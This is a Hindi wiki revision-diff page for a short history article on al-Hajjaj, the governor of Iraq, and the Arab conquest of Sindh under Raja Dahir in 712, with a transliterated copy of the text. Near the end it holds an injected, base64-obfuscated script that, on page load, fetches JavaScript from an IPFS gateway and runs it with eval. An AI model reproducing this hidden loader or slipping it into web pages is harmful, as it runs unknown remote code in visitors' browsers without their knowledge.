Difference between revisions of "अलहज्जाज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*अलहज्जाज ख़लीफ़ा वालिद के समय ईराक़ का [[मुसलमान]] सूबेदार था।  
+
'''अलहज्जाज''' ख़लीफ़ा वालिद के समय ईराक़ का [[मुसलमान]] [[सूबेदार]] था।
*उस समय [[सिंध प्रांत|सिंध]] में [[दाहिर|राजा दाहिर]] का शासन था।  
+
 
 +
*अलहज्जाज के समय [[सिंध प्रांत|सिंध]] में [[दाहिर|राजा दाहिर]] का शासन था।  
 
*सिंध के कुछ लुटेरों की लूटमार से क्रुद्ध होकर अलहज्जाज ने उन्हें दण्डित करने के लिए कई बार चढ़ाई की, किन्तु राजा दाहिर ने उसकी फ़ौजों को पराजित कर दिया।  
 
*सिंध के कुछ लुटेरों की लूटमार से क्रुद्ध होकर अलहज्जाज ने उन्हें दण्डित करने के लिए कई बार चढ़ाई की, किन्तु राजा दाहिर ने उसकी फ़ौजों को पराजित कर दिया।  
*इसके बाद में अलहज्जाज ने अपने भतीजे और दामाद मुहम्मद इब्नकासिद के साथ बड़ी फ़ौज भेजी, जिसने राउर की लड़ाई (712 ई.) में राजा दाहिर को पराजित करके उसको क़त्ल कर दिया और सिंध में मुसलमानी राज्य की स्थापना की।
+
*बाद में अलहज्जाज ने अपने भतीजे और दामाद मुहम्मद इब्नकासिद के साथ बड़ी फ़ौज भेजी, जिसने राउर की लड़ाई (712 ई.) में राजा दाहिर को पराजित करके उसको क़त्ल कर दिया और सिंध में मुसलमानी राज्य की स्थापना की।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 06:45, 2 December 2012

alahajjaj khalifa valid ke samay eeraq ka musalaman soobedar tha.

  • alahajjaj ke samay siandh mean raja dahir ka shasan tha.
  • siandh ke kuchh luteroan ki lootamar se kruddh hokar alahajjaj ne unhean dandit karane ke lie kee bar chadhaee ki, kintu raja dahir ne usaki faujoan ko parajit kar diya.
  • bad mean alahajjaj ne apane bhatije aur damad muhammad ibnakasid ke sath b di fauj bheji, jisane raur ki l daee (712 ee.) mean raja dahir ko parajit karake usako qatl kar diya aur siandh mean musalamani rajy ki sthapana ki.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh